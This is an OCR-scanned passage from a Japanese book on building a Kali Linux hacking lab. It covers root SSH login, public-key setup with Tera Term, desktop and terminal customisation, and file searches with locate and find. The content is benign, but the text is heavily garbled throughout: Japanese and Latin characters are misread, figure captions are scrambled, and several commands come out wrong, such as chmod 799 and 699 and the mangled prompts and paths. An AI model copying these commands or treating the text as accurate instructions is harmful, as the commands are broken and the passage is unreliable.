縮 !M FX] Real File 王 % FEDLaCe 較 有 | UICUL TExt 環 』T0 SDelI Go TO Line 園 


図 2.62 nano で 編集 し た と ころ 


2)sshd を 再起 動 する 


Poot@⑱ka11:<# systemct て 1 restart ssh 


3 SSH で ロク イン する 


localhosSt、 す な わ ち Kali の Terminal か ら 、SSH で ログ イン を 試み ます 
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Poot 貼 ka11:<# ssh roott 條 1oca1host 


Poot 合 1oca1host's password: eo の リム アア た コマ ンタ も ヒー 


Linux ka1i 4.15.9-ka]1i2-amd64 #1 SMP Debian 4.15.11-1ka1i1 。」 
(2918-93-21) x86_64 





The programs included with the Ka11i GNU/Linux system are free 
SO†tware : 

the exact distribution terms for each program are described in | 
the 

1ndividual files in /usr/share/doc/*/copyright . 


Ka11 GNU/L1inux comes with ABSOLUTELY NO MARRANTY , to the extent 
permitted by applicable law. 


Poo て 帳 Kka11 : < 菩 ssh に ログ イン で きた 。 


④)root ユ ー ザ ー で 接続 で きる こと を 確認 する 
リモ ー ト か ら root ユ ー ザ ー で Kali に 接続 で きる こと を 確認 し ます 。 


人 @ SSH に 公開 鍵 認 証 で ログ イン する 

これ で 、 パ スワ ー ド 認証 に より SSH で ログ イン で きる よう に な り ま し た 。 つま 
り 、 パ スワ ー ド を 知っ て いれ ば 誰 で も リモ ー ト か ら Kalii に ログ イン で きま す 。 公 
開 鍵 認 証 を 採用 する こと で 、 秘 客 鍵 を 持つ 端末 だ け か ら の アク セス を 許可 で きま 
す 。 

公開 鍵 認 証 で は 、 ま ず 鍵 生成 プロ グラ ム を 使っ て 公開 鍵 と 秘密 鍵 を 生成 し ます 。 
公開 鍵 は 接続 され る 側 (ここ で は Kali) 、 秘 客 鍵 は 接続 する 側 (ここ で は SSH ク ラ 
イア ント ) に 配置 し ます 。 デ ジタル 賭 名 で 認証 を 実現 し て いる と イメ ー ジ すれ ば 
よい で し ょ う (45)。 


*45 : デジ タル 著名 の 用 語 で いえ ば 、 接 続 す る 側 で は 賭 名 鍵 ( 秘 審 鍵 で 代用 )、 接 続 さ れる 側 で は 
検証 鍵 (公開 鍵 で 代用 ) を 用 いま す 。 デ ジタル 著名 に つい て は 「『 暗 号 技 術 の すべ て 』 ( 先 泳 社 刊 ) 
を 参照 し て くだ さい 。 同書 の 第 7 章 で 詳し く 解 説 し て いま す 。 


http//s-akademeia.sakurane.jp/main/books/cipher/ 
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り 公開 鍵 と 秘密 鍵 を 生成 する 


Tera Term を 起動 し ます 。 接続 画 面 で 、 


ニュ ー の | 設定 」 > 「SSH 鍵 生成 」 


里 末 [T)-. 

ウィ ンド ウ (W).… 
フォ ント (F).. 
キー ホー ド (K、.. 


シリ アリ ル ホ ー ト [EI 
ブ プロ + シバ]... 


SS5H... 
SSH 研 3(A)..… 
SSH 転 送 (0]... 
ここ H 揚 生 局 (N)..- 

『 し PIN. 

公表 (G) 

その 他 の 府 定 (D|..- 


図 2.63 SSH 鍵 生成 を 選ぶ 


 TTSSH : 鍵 生 成 」 画面 が 表示 され る の - 


( 図 2-64 ) 。 


RSA1 @REA puSa 
J ECUSA-S55 
J ECDSA-53 | ED25519 
表 の パス フレ ー ズ : 
!? メ コレ ー ズ の 中 な 


コペン ー バ 〇 ) 


FIEcryp1 KDF 瑞 3K( ト ) 


er リト る = 


ECDSA-3381 





「 キ ャ ン セ ル ] ボタ ン を 押し ます 。 メ 


を 選び ます ( 図 263)。 





ーー 


で 、 そ の まま [生成] ボタ ン を 押し ます 


ビット 計 (B) | 和 世 Q 


204 | 慰 CsG) 


図 2.64 「[TTSSH : 鍵 生 成 」 画面 


する と 、 中 中 に 
( 図 2.65) 


用 いる パス ワー ド の よう な も の で す 
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鍵 を 生成 し まし た 」 と 表示 され 、 


任 の ) 1 放 。 レ ー 1 レア 力 で 


パス フレ ー ズ は 、 公 開 鍵 認証 で ログ イン する 際 に 
パス フレ ー ズ を 入力 し 、 [公開 鍵 の 保存 ] ボ 
ファ イル 名 は "id_rsapub' と し ます 


過 ーー | まげ 2 宅 < な / か 4 ロロ 左 
そし て 、【[| 秘 客 鍵 の 保存 」 
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ボタ ン を 押し ます 。 フ ァイル 名 は "id_ rsa と し ます 。 保存 が 終わ っ た ら 、 こ の 画 
面 を 半 じ ます 46)。 


ma 、、 生 jG 」 
PR5Il 春 GA ぐ )DSA ピッ ト 救 (HB ょ し 主 j(GV | 
ECDSA-255 上 ECUDS 上 3 時 21 利 明 じ る (Cy 


)ECDSA-52| 表 ED255!I9 
引 き 生成 し まし た 。 
壮 の カコ フレ ー ズ : 間 大 仙人 負 外 信人 きす 
パス コレ ー ズ の 9 店 旬 名 名人 る 人 る ゆ る の 
コメ ン F(O》 jpJcondGarom 
bciypt KDF 形 素 (F) コロ ンド 彼 (N 
な 韻 続 の 保存 0 | 秘 市 和 の (ATP 





図 2-65 公開 鍵 と 秘密 鍵 の 保存 


2) 鍵 の 設定 を する 
Tera Term を 用 いて 、 公 開 鍵 認証 し た い ユ ー ザ ー を 指定 し 、 パ スワ リー ド 認 証 で 
SSH ロ グイ ン し ます 。 ロ グイ ン し た ら 、 メ ニュ ー の | ファ イル | > 1|SSH SCP| を 


選び ます ( 図 2.66) (*47)。 


10 フ 2 1 


| ファ イ 」 し F) | 各 正 (E) 傘 定 (S) コン トロ ー ル (O) ウィ ンド ウツ (W) ヘル プ (H) 
新しい 拓 拒 (N].. 
セッ ショ ン の 窒 (U] 
CyQwin 震 科 (G) narace っ 
ログ (L).… l/cepyri 導 t. 
ログ に コメ ント を 何 iO 


グ を 表示 (V) 


2 TID AKANTT 


ーー プイ ログ ガ 坪 王 jy O NO 1 の 
2 家 小 ! W7 |。 | fmom IM/.15 


ファ イル 送信 (5).… 
転 誠 ( 

SS5 ロ SCD.. 

ディ レク トリ を 実 天 [て )--- 
ログ を 再生 (R).… 





TTY Reoord 


2-66 SSH 公 開 鍵 の 転送 


*46 : 公開 鍵 と 秘 審 鍵 は ペア の 関係 に な り ま す 。 画面 を 開い た 状態 で 公開 鍵 と 秘 審 鍵 の 両方 を 出力 
し ます 。 い っ た ん 画面 を 閉じ て し まう と 、 パ スフレ ー ズ が 同じ で も まっ た く の 別 物 に な っ て し ま 
* っ = デー に 
いま 


*47 : SCP (Secure File Copy) と は 、SSH を 利用 し た セキ ュ ア な ファ イル 転送 の こと 
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From に "id_rsa.pub" を 選び ます 。 To では“"/" (ホー ム デ ィ レ クト リ ) が 指定 さ 
れ て いま す 。 [Send] ボタ ン を 押す と 、To で 指定 し た パス に ファ イル が コピ ビー さき 


れ ま す ( 図 2-67)。 


Fromi Cscrs ポ in cron 字 clopFd_rsa_p 
To: -/ 
You Can draq Te 朋 e tn is wndow. 


ーーーー ニ ーーーーーーーーーーーーーーーーーーーーーーーーー ニ ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー 一 


om: 





To, に C:*Prodram 円 紀 E (xSSYt=r=t=rm 問 





図 2-67 「TTSSH: Secure File Copy」 画面 


画面 を 閉じ た ら 、ls コ マン ド で 'jiqd_rsapub' ファ イル が 存在 する こと 


ます 。 


Poott 仙 ka11:< 井 1s -]1a 1d rsa.pub 
-PM- ド ーー ドーー 1 root root 396 Jul 21 12:27 1d rsa.pub 


次 の よう に 入力 し て 、"id_rsajpub" ファ イル の 内 容 を "authorized_keys" ファイ 
ル に コピ ビー し ます 。 その後 、chmod コマ ンド で 所 有 者 の み が 読 め る よう に アク セ 


ス 設定 し ます 。 


Poot 細 ka1 ュ 1: cat 1d rsa.pub >> ./.ssh/authorized keys 
rootka11:<# cat ./.ssh/authorized keys 


ssh-rsa AAAAB3NzaC1yc2EAAAABTwAAAOEAxUL9L13Md9JwGtP1Lqs392ZzHA/.」 


wC4hkcSfz ( 略 ) 


h2dneR2DvAoBcTh]†8UeH6G]nsmbTvV9e/Mb79z]0== 1pus1ronQGaroa 


root 仙 ka11:<# chmod -R 799 ./.ssh/ 
Poo て 細 ka11:-# chmod -R 699 ./.ssh/authorized keys 


以上 で 鍵 の 設定 は 完了 で す 。 
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3 公開 鍵 認 証 を 有効 に する 
公開 鍵 認 証 を 有効 に する た め に 、sshd の 設定 ファ イル に て コメ ント アウ ト を 外 
も ます 。 





④sshd を 再起 動 す る 
sshd を 再起 動 し ます 。 





⑤) 公 開 鍵 認 証 が で きる こと を 確認 する 

以上 で 設定 を 完了 し た の で 、Tera Term を 別に 起動 し て 、SSH 認証 画面 を 開き 
ます 。「RSA/DSA/ECDSA/ED25519 鍵 を 使う ] に チェ ッ ク を 入れ て 、 秘 密 鍵 に 
id_rsa ファ イル を 指定 し ます ( 図 2-68)。 公 開 鍵 認証 で は 、 ユ ー ザ ー 名 、 パ ス フ 
レー ズ 、 秘 密 鍵 の 3 つが 揃う こと で ログ イン で きる わけ で す 。 

Kai に ログ イン で き て 、 コ マン ド を 実行 で きる こと を 確認 し ます 。 
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に ニル 9 本 | 8 
| ロジ イン 192.158.151 
2 信正 で す . 


ュ ユーザ MD ioai 


リス フレ ー ズ (「) で で の ゆで 
了 |」f ス リーF を > メモリ 上 | に こ 記 人 協 す る (MD 
に | エー ジェ ント 影 さ する (0] 


0 プレ イン バス ワー ド ネ そま XLU) 


@ HSP/DSA/ZECUDSA/ED255 1W を 修 う 完 空 団 KA 】 Cdrsa 


rhoctslSSH1 窟 キ う ロー カル の ユー リ 名 し U) 


| っ ト KF 
⑤ チャ レン デ アレ スポ ンス SE を ( ま バ キー ボー ドイ ンタ な ラウ ティブ X 〇 ) 
Poscrt を (うう 


Ok | 00) | 





図 2.68 Tera Term に よる 公開 鍵 認 証 


6 パス ワー ド 認 証 を 無効 に する 
この 段階 で は 、 パ スワ ー 人 ら ゃ も 有効 に な っ て いま す 。 
パス ワリ ワード 認証 が 不要 で あれ ば 、 無 効 に し ます 


Pam ド 和 機能 を 無効 に する 


Kalii を し ば らく 操作 せ ず に お く と 、"Automatic suspend" と いう 通知 が 表示 され 
ます ( 図 2-69)。 


% CUEI【 二 1 に 1 り コ ョ に 
| | ビ [| WW | | 


図 2.69 "Automatic suspend* と いう 通知 





この 通知 が 出 な いよ うに する に は 、 目 動 サ スペ ンド 機能 を 無効 に し ます 。 
Settings 画面 の 左 ペ イン の |Power」 を 選び 、| Automatic suspend」 を 押し ます 。 
電源 コー ド が つなが っ て いる と き に この 通知 が 出 な いよ うに する に は 、「Plugged 


*48 : パス リー ド 認 証 を 無効 に する に は 、 "/etc/ssh/sshd config ファ イル の PasswordAuthentication 
を yes か ら no に 変更 し ます 
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iml」 の 横 の スラ イド スイ ッ チ を OFF に し ます ( 図 2-70)。 こ れ で 自動 サス ペン ド 機 
能 は 無効 に な り 、 通 知 が 表示 され な く な り ま す 。 


elaw | 20minutes マ | 


お 
NR Pe 


Dely 2J IES ・ | 





図 2-70 自動 サス ペン ド 機 能 の 無効 化 


沙 Files の 隠し ファ イル の 表示 の 有効 化 
Kalii に は Files と いう ファ イル ・ エ エクスプロー ラー が イン スト ー ル され て いま 
す 。 左側 の ラン チャ ー か ら Files を 起動 する と 、 ホ ー ム ディ レク トリ が 開き ます 。 
root の ホー ム デ ィ レ クト リ に て ls -a コ マン ド を 実行 する と 、 図 2771 の よう に な 
り ま す 。-a オ プシ ョ ン は 、 す べ て の ファ イル を 対象 に する こと を 意味 し ます 。 


.VDOXCL1ent-CL1Dboard . D1dq 
.VboxCctient-disptay .p1d 
OXC 
【 


7boxcL1ent-draqanddrop . D1d 
.VbDoxCL1ent- seamLess.D1d 


.TCEauthOT1ty 





RhYAIIhNINES 


図 2.71 root の ホー ム デ ィ レ クト リ の 中 身 
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Files の 表示 と ls コマ ンド の 結果 を 比べ る と 、 Files で 表示 され て いる ファ イル の 
方 が 圧倒 的 に 少な いこ と が わか り ま す 。 ま た 、|.」 か ら 始 まる ファ イル が 表示 され 
て いな いこ と も わか り ま す 。 Linux の 場合 、|.」 か ら 始 まる ファ イル は 了 し ファ イ 
ル と し て 扱わ れ て いま す 。Files で は 隠し レフ ァイル を デフ ォ ル ト で 表示 し な いよ う 
に な っ て いる た め 、 出 力 に 差異 が び 本 じ た わ け で す 。 Files で 隙 し ファ イル を 表示 す 
る に は 、 ア イコ ン か ら メ ニュ ー を 表示 し 、|Show Hidden Files」 に チェ ッ ク を 入れ 


ま す ( 2-72 ) 0 


| Kali-Lnux-2018.2 (64b) [スナ ッ ブ ショ ッ ト 1| [ 寺 行 中 | - Oraclc VM VitualBox 
ファ イル 仮 枯 マ シ ツ 表示 入力 テイ ス 入 ル 了 プア 


ざ Recent 

fJ Home 

還 DeSKtOD 
| ] Documents 
⑦ め Downloads 
2 Music 

( 口 Pictures 

昌 videos 


調 Trash 


回 sf_share .vboxclent-  .yboxcllent- 
dlsDlaV.Dd Craqanddro Seamles5. 


.Did Id 
寺 Other Locations PP P 


図 2-72 隠し ファ イル の 表示 の 有効 化 
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Undo 
Red0 


SOft 

AA-Z (の) 

〆- 和 し ) 

Last Modified 刻 

First Modiicd 

SIZe に 
ImInfo Type り ) 


Show Hidden Files に に] 





つ 多 凍 み ココ ほ 面 回 ②⑳ 較 Re Ccncl . 
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泡 Terminal を カス タマ イズ する 


Terminal の メニ ュー の 「Edit」 > 「Preferences」 を 選ぶ と 、Preferences 画面 が 
表示 され ます 。 


Text タ フ 
[Custom font」 に チェ ッ ク を 入れ る と 、 フ ォ ン ト の 種類 と サイ ズ を 変更 で きま す 。 


Colors タフ 
背景 色 、 文 字 色 な ど を 変更 で きま す 。 


沙 Terminal を ショ ー ト カッ トキ ー で 起動 する 

Kalii で は Terminal の ショ ー ト カッ トキ ー が デフ ォ ル ト で 設定 され て いま せん 。 
Ubuntu で は 、 [Ctrl] + [Alt] + [t] キー で Terminal が 開く よう に な っ て いま す 。 
これ と 同じ 設定 に し た い 場 合 に は 、 こ こ で 説明 する 手順 を 参考 に し て くだ さい 。 

VirtualBox の ホス トキ ー は [Ctrl] + [Alt] キー で す 。 そ の た め 、Terminal を 
ショ ー ト カッ トキ ー で 起動 し よう と する と 、VirtualBox に 制御 が 枚 わ れ 、 結 果 と 
し て [Host] + [t] キー を 押し た も の と し て 認識 され て し まい 、「 ス ナッ プシ ョ ッ 
ト の 作成 」 画面 が 表示 され て し まい ます 。 

そこ で 、 ホ スト キー を 変更 し て か ら 、Kalii に ショ ー ト カッ トキ ー を 登録 する と い 
う 手 順に な り ま す 。 


①)VirtualBox の ホス トキ ー を 変更 する 

VirtualBox の デフ ォ ル ト の ホス トキ ー は [Ctrl] + [Altl] キー で す が 、 こ れ を 
[Ctrll + [Alt] + [Winl キー に 変更 し ます 。 

環境 設定 画面 を 表示 し 、 左 ペイ ン か ら 「 入 力 」 を 選び 、 | 仮想 マシ ン 」 タプ を 選 
び ま す 。「 ホ スト キー の 組み 合わ せ ] の ショ ー ト カッ ト を 選択 し て 入力 状態 に な っ 
た ら 、 [Ctrl] + [Alt] + [Win] キー を 押し ます 。「Left Windows + Ctrl + Alt」 
と 表示 され れ ば 、 う まく 認識 され た こと を 意味 し ます 。 [OK] ボタ ン を 押し て 反 
映 さ せま す ( 図 2-73)。 
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」 
ホス ト \ー 中 組む 合せ Left WWindcwws 1 Di 4 Al 


ACE も ws ト ガ ウレ Host 
GU[ を テッ 子 
CAgst anditeric じ CD イメ ー ジ di 鶴 ス 


、 キー ボー ドロ 自 人 名和 キ * ブ ォ ッ プロ) 





図 2-73 ホス トキ ー の 変更 


ホス トキ ー の た め の キ ー の 組み 合わ せ を 忘れ て も 、 問 題 は あり ませ ん 。 仮想 マ 
ン ン の ウィ ンド ウ の 右 下 に 表示 され る た めで す ( 図 2-74)。 





図 で 〇 本 グ 豆 思 思 ⑳ [回 Left Windows + Ctrl+ 章 


図 2-/74 ホス トキ ー の 確認 


2)Terminal の ショ ー ト カッ トキ ー を 設定 する 

次 に 、Kali の Settings 画 面 を 起動 し ます 。 左 ペ イン か ら | Devices」 > [Keyboard」 
を 選択 し ます 。 下 まで スク ロー ル し て 「+ | を 押し ます 。 

Add Custom Shortcut 画面 が 表示 され る の で 、 次 の よう に 設定 し て [Add] ボタ 
ン を 押し ます ( 図 2-75) 。 


s Name : Launch Terminal 
s Command : gnome-terrmninal 
* Shortcut : [Ctrl + LAIt] +[T] 
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殿 (1 IKeyboard] を 選択 し ます 。 と 月 は: < アン 4 ル ョ ピコ | 時 中 


④ ふ Add Custom Short 
cut 画面 が 表示 され 
る の で 、lermlnal の 
id リル リリ ビ 和 に は / 
避 り ) こ か 志 ー プ や 1 9 た < 
す 。 


③「+」 を 押し ます 。 詩 ⑨ 


図 2-75 「Add Custom Shortcutl 画面 の 設定 





する と 、Keyboard 画 面 の 一 番 下 に カス タム ショ ー ト カッ ト と し て 「Launch 
Terminall が 登録 され て いる こと を 確認 で きま す 。 


(3⑬ ショー トカ ッ ト キ ー で 起動 で きる こと を 確認 する 
[Ctrl] + [Alt] + [t] キー を 押し て 、Terminal が 新規 に 起動 する こと を 確認 
し ます 。 


誠 Terminal を 拡張 する 

Kalii に デフ ォ ル ト で 備わっ て いる Terminal は シン プル で 使い や すい の で す が 、 
より 操作 性 を 向上 させ た けれ ば 、 拡 張 版 の Terminal を 導入 する こと を お すす めし 
ます 。 

ここ で は 、 Terminator と いう 拡張 版 Terminal を イン スト ー ル し ます 。 次 の コマ 
ンド で イン スト ー ル で きま す 。 
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root@ka1i:<# apt insta11 terminator -y 


Terminator は 、 従来 の Terminal に で きる こと を すべ て 実現 で き 、 さ ら に タブ や 
画面 分 割 に 対応 し て いま す 。 画面 の 移動 も キー ボー ド だ け で 完結 する の で 、 複 数 
の Terminal を マウ ス で いっ た りき た りす る より も 操作 スピ ー ド が 向上 し ます 。 ま 
た 、 画 面 分 割 で 別 の 画面 を 参照 し な が ら 作 業 で きる の で 、vi な どの Terminal 内 で 
動作 する ソフ トウ ェ ア や 、top な どの 監視 系 コマ ンド と 相性 が よい と いえ ます 。 

Terminator を 起動 する 際 に は 、 左側 の ラン チャ ー か ら ア プリ 一 覧 を 起動 し ま 
す 。 そ の 一 番 上 に 検索 入力 欄 が ある の で "terminator" と 入力 し ます 。 す る と 、 
Terminator の アイ コン が 表示 され る の で 、 右 クリ ッ ク し て 「Add to Favorites」 を 
選び ます 。 す る と 、 ラ ンチ ャ ー に 登録 され ます 。 起動 する に は ラン チャ ー の 
Terminator ア イコ ン (赤い Termnal) を 押し ます 。 


僅 便利 な キー コマ ンド 
Terminator で は 表 2.3 の よう に 、 キー 入力 だ け で 画面 を 分 割 し た り 、 移動 し た り 
で きま す 。 


表 2-3 Terminator の キー コマ ンド 


Ii OTRIWIWVWVWVV ア パパ 





*49 : 画面 を 右 ク リッ ク し て [Closel で も 閉じ られ ます 。 
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その 他 の キー コマ ンド に つい て は 、man terminator コ マン ド で 参照 し て くだ さ 
い 。 


効 テー マ を 変え る 


Kalii に は GNOME Tweaks が イン スト ー ル され て お り 、 次 の コマ ンド を 実行 す 
る と 立ち 上 が り ま す ( 図 2-76) C50)。 





図 2-76 GNOME Tweaks の 設定 画面 


この 設定 画面 か ら 、 デ スク トッ プ の 見 た 目 ヤ フォ ント 、 ウ ィ ン ド ウ な ど に つい 
て 細か く カ スタ マイ ズ で きま す 。「Appearance」 > 「Themes」 か ら 、Kali の 外観 
を 好み の も の に 変更 で きま す 。 


*50 : Kall の パー ジョ ン に よっ て は gnome-tweak-tool で 起動 する 場合 も あり ます 。 
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クリ ッ プ ボー ド の 共有 設定 が 有効 で やあ る に も か か わら ず 、 突 然 コ ピー ペー ス 
ト が で き な く な っ て し まう こと が あり ます 。 特に 、 仮 想 マ シン を 保存 状態 で 閉じ 
て か ら 、 復 帰し た と き に 起こ りや すい と いえ ます 。 

その と き は 、 ゲ スト OS で 稼働 し て いる VirtualBox の VBoxTray や VBoxClient 
を 再起 動 す る と 直る こと が あり ます 。 


ゲス ト OS が Windows の 場合 

"VBoxTray.exe ファ イル は VirtualBox Guest Additions (VBoxGuest 
Additions) を イン スト ー ル し た た フォルダー と 、"C 六 Windows\System32" 
フォ ル ダ ー に 展開 され て いま す 。 通常 、C:\Windows\System32 フォ ル ダ ー 


に 展開 され て いる VBoxTray.exe が 起動 され て いま す 。 そこ で 、PowerShell 
を 起動 し て 、 次 を 実行 し ます 。 


>cd C:\Mindows\System32 
>StoDp-Process -Name VBoxIray 


>Start-Process C:\Mindows\System32\VBoxTray - exe 


ゲス ト OS が Linux の 場合 
次 の よう に 実行 し て 、VBoxClient を 再起 動 し ます 。 


# pkil]1 - 和 † VBoxClient: /usr/bin/VBoxClient --clipboard 
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2-7 | ファ イル の 探し 方 





ファ イル を 検索 する 方 法 は 色々 あり ます が 、locate コ マン ド 
使え れ ば 多く の 場面 に 対応 で きま す 。 
得 し て し まい まし ょ う 。 


と find コ マン ド が 
Kali を 操作 し つつ 、 Linux の 基本 も 同時 に 避 


沙 Files の 検索 機能 


Files に は ファ イル 検索 機能 が 備わっ て いま す 。 上 部 の 中 眼鏡 アイ コン を 押す 
検索 キー ワー ド の 入力 欄 が 表示 きれ ます ( 図 2.77)。 


② 忠 眼 縛 ボタ ン を 押す と 、 検索 キー 
に そう で | ( リ ァ だ コア ウン 4 はり ワー ド の 入力 欄 が 表示 され ます 。 


デスト ファ 65b_exPiot 


Ioctnr py 


和 065s 画 画 


Pictuees Puplr PJDpeteer * TemPeS 
5 『rash 


ャ OOIIEI LOCalOms 





2-77 Files の 検索 橋 能 


起動 時 は 、 検 索 対 象 の ディ レク トリ が ホー ム デ ィ レ 
ペイ ン か ら |Other Locations」 


に 移動 し ます 。 こ の ディ レク トリ は Linux に お ける 最上 位 に な り ま す 。 つ まり 、 
- こ で 検索 すれ ば 、 シ ステ ム す べ て が 検索 対象 に な り ま す 。 


ャ ーー" よ 


クト リ に な っ て いま す 。 左 
を 選択 し 、|Computer」 を 選ぶ と 、/ デイ レク ト 


例え ば 、 passwd と いう キー ワー ド で 検索 する と 、 図 2278 の よう に た くさ ん の 
ファ イル が 見 つか り ま し た 。 
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Se Locatlon 


EtC 
varbacKups 
usr/bln 
Pacswti_client etC/exim4 
etc/rron.dally 


etc/pam.d 


etc バ eCurty 


us「/b 和 mn 


US「/5hare 





図 2-78 "passwd" で 検索 し た と ころ 


湊 locate コマ ンド 


locate コ マン ド は 、 フ ァイル や コマ ンド の パス を 探せ る コマ ンド で す 。 


Poot@⑳⑱kal1:<# ocate passwd 
/etc/passwd 
/etc/passwgd - 
/etc/a1ternatives/vncpasswd 


( 略 ) 


実際 に 入力 し て みる と わか り ま す が 、 出 力 は か な り 速 いと いえ ます 。 リ アル タ 
イム に ファ イル を 探索 し て 出力 し て いる わけ で は な さそ う で す 。 実 の と ころ 
locate コマ ンド は 、 フ ァイル 一 覧 デー タベース を 持っ て お り 、 そ こ を 検索 し て いま 
す 。 逆 に いえ ば 、 作 成 し た ば か り の ファ イル は ファ イル 一 覧 デー タベース に 登録 
され て お ら ず 、locate コマ ンド の 出力 に 現れ ませ ん 。 

この ファ イル 一 覧 デー タベース は 、 定 期 的 に 自動 で 更新 され て いま す 。 /etc/ 
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cron.daily/mlocate ファ イル C51) が 使用 され て お り 、 シ ステ ム が 稼働 し て いれ ば 
1 日 に 1 回 更新 され て いま す 。 

また 、 手 動 で も ファ イル 一 覧 デー タベース を 更新 で きま す 。 そ の 場合 は 
updatedb コ マン ド を 実行 し ます 。 


Poot 同 Ka11 :># updatedb 


差分 で 更新 され て いる の で 、 大 量 に ファ イル を 追加 し な い 限 り 、 数 秒 で 処理 が 
完了 し ます 。 


Iocate の ファ イル 一 覧 デー タベース は どこ に ある の か 


locate コ マン ド に -S オ プシ ョ ン を 付け る と 、 使 用 し て いる ファ イル 一 覧 デー タ 
ベー ス の パス と 登録 され て いる 内 容 の サイ ズ が わか り ま す 。 


Poot 人 kal1 :>/pro]ect# locate -S 

Database /var/11ib/mlocate/mlocate . db : 
49.965 director1es 
546 ,657 files 
34.427,976 bytes 1n †ile names 
12,595,385 bytes used to store database 


と ころ で 、Kali は Debian 系 で あり 、 コ マン ド が パッ ケー ジ で 提供 され て いろ る こ 
と が あり ます (*52) 。 こ こ で は 、 locate コ マン ド の ソー スコ ー ド か ら フ ァイル 一 覧 
デー タベース の パス を 探し て み ま す 。 

ソー スコ ー ド を 見 た い コ マン ド が どの パッ ケー ジ に 和信 まれ て いる か を 調べ ま 
す 。 apt-file を 使え ば 確認 で きる の で 、 ま ず は apt-fiile を イン スト ー ル し ます 。 そ の 


*51 : "mlocate" の 頭 文 字 の mm は 、"merging を 意味 し ます 。 


*52 : Linunx カ ー ネ ル の ソー スコ ー ド は 、The Linux Kernel Archives (https//www.kernelorg/) 
か ら ダ ウン ロー ド 可 能 で す 。 ま た 、ls や rm と いっ た コマ ンド は coreutils に 含ま れ て お り 、The 
GNU Operating System (http://www.gnuorg/) か ら ソ ゾ ソース コー ド を ダウ ン ロ ー ド で きま す 。 
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後 、apt-file update コマ ンド で 情報 を 更新 し ます 。 


noott 條 ka11:<# apt nstal] apt-file 
Poot 個 ka11 :< 韻 apt-†ile update 


それ で は 、locate コ マン ド が 含ま れ て いる パッ ケー ジ を 確認 し ます 。 単純 に 
ocate だ け を 指定 する と 、 出 力 が 多 す ぎる の で 、 フ ル パ ス を 指定 し ます 。 


roo て 倍 ka11:<# 1ocate locate 
( 略 ) 
/usr/b1n/ 1ocate 
( 略 ) 
Poott 個 kal1:<# 1s -1a /usr/bin/1ocate 
1rwxrwxrwx 1 root root 24 Apr 27 93:27 /usr/bin/1ocate -> 
/etc/alternatives/locate 
Poot 仙 kal1:<# 1s -1a /etc/alternatives/ 1ocate 
1rwxrwxrwx 1 root root 16 Apr 27 93:27 /etc/a1ternatives/-」 
locate -> /usr/bin/mlocate 
Poott 個 ka11i:<# 1s -]1a /usr/bin/mlocate 
-PwXP-SF-X 1 root mlocate 39689 Nov 13 2916 /usr/bin/mlocate 


/uSr/bin/locate は シン ボリ ッ ク リ ンク で あり 、/usr/bin/mlocate が 本 体 で あ 
る こと が わか り ま す 。 


roott 個 ka11 :< 井 apt-†ile search /usr/b1n/mlocate 


mlocate: /usr/b1in/mlocate 


mlocate パ ッ ケ ー ジ だ と 判明 し まし た 。 それ で は この パッ ケー ジ の ソー スコ ー ド 
を 取得 し ます 。 


roo て 個 ka11 :< 井 apt source mlocate 
Read1ng package lsts... Done 
E: You must put some "source' URITs 1n your Sources . 11s 二 
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この エラ ー が 出る の は 、/etc/apt/sourceslisSt ファ イル に お いて deb-src が コメ 
ント アウ ト さ れ て いる た めで す 。 deb-src の コメ ント アウ ト を 取り 除き 、 リ ポジ ト 
リ の デー タベース を 更新 し て か ら 、 再 び ソ ー ス の ダウ ン ロ ー ド を 実行 し ます 。 


Poott 條 kal1 : > 共 apt update 


Foot 人 Kal1 :< 井 apt source mlocate 


ダウ ン ロ ー ド し た ソー スコ ー ド は カレ ント ディ レク トリ に 保存 され ます 。 


roota11:<# cd mlocate-9.26/ 
root 個 a11 :</ 大 10Cate-9.26# 1 


ABOUT-NLS AUTHORS Configure.ac doc INSTALL Makefile.in README 
aclocal.4 ChangeLog COPYING gnulib mW4 NEMS SFC 
admin configure debian HACKING Makefile.am po tests 


"Makefileam" フ ァイル に て 、 次 の よう に デー タベース の ファ イル 名 が 定義 され 
て いる 箇所 が あり まし た 。 


Makefile .am 


# 圭 Se て 1ngS 
dbdir = $(localstatednr ) /mlocate 
dbf1le = $(dbdir ) /mlocate . db 


"mlocate/mlocate db" と いう パス を 含む と 推測 で きる の で 、 locate コマ ンド で 探 
すっ 


root 個 ka11:<# ocate mlocate/mlocate . db 
/var/11b/mlocate/mlocate . db 
/var/1ib/mlocate/mlocate . db .02995d 

Poot 條 ka11:<# 1s -1a /var/11b/mlocate/mlocate . db 

ー-PW- ド ーーーーー 1 root mlocate 11634439 Jun 9 21:21 /var/1ib/-」 
mlocate/mlocate . db 





120 | 第 1 部 | ハッ キン グ ・ ラ ボ の 構築 


ツ yar/lib/mlocate/mlocatedb" ファ イル は 、 サイ ズ も 大 きく 、 これ が デー タ ベ ー 
ス 本 体 と 推測 で きま す 。S オ プシ ョ ン を 付け て 調べ た 結果 と も 一 致し ます 。man 
コマ ンド で locate コマ ンド に つい て 調べ る と 、 推 測 が 正しかっ た こと が わか り ま す 。 


roo て 個 ka11 :< 井 man locate 


( 略 ) 
FILES 
/var/ 1ib/mlocate/mlocate .db 


The database searched by defaul. 
( 略 ) 


協 find コマ ンド 


fnd コマ ンド は 、 指 定 し た ディ レク トリ 配下 の ファ イル を 検索 する た め の コ マ 
ンド で す 。 最も 基本 的 な 使い 方 は 、 フ ァイル の パス を 検索 する と き で し ょ う 。 書 
式 は 次 の 通り で す 。 


$ find < 検索 し た い デ ィ レ クト リ > -name < 検索 キー ワー ド > 


例え ば 、"/etc ディ レク トリ 配下 か ら passwd' と いう 名 前 の ファ イル を 検索 す 
る と き は 、 次 の よう に し ます 。 


Poot 個 ka11:<# 千 ind /etc -name passwd 
/etc/passwd 

/etc/cron . daily/pas swd 
/etc/pam . d/ pas swd 


どの ディ レク トリ に 属す る か わか ら な けれ ば 、 ル ー ト ディ レク トリ を 指定 し て 
シス テム 全体 を 検索 し ます 。 
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但 ワイ ルド カー ド や 正規 表現 を 利用 し て 検索 する 
ファ イル 名 に は ワイ ルド カー ド が 使え る の で 、 特 定 の 拡張 子 の み の フ ァイル を 


検索 し た けれ ば 、 次 の よう に し ます 。 





大 文字 ・ 小 文字 を 区 別 し な い の で あれ ば 、-name オプ ショ ン の 代わ り に 、-iname 
オプ ショ ン を 使い ます 。 

ワイ ルド カー ド で は 足り な い 複 雑 な 条件 で あれ ば 、-regex オ プシ ョ ン を 用 いて 
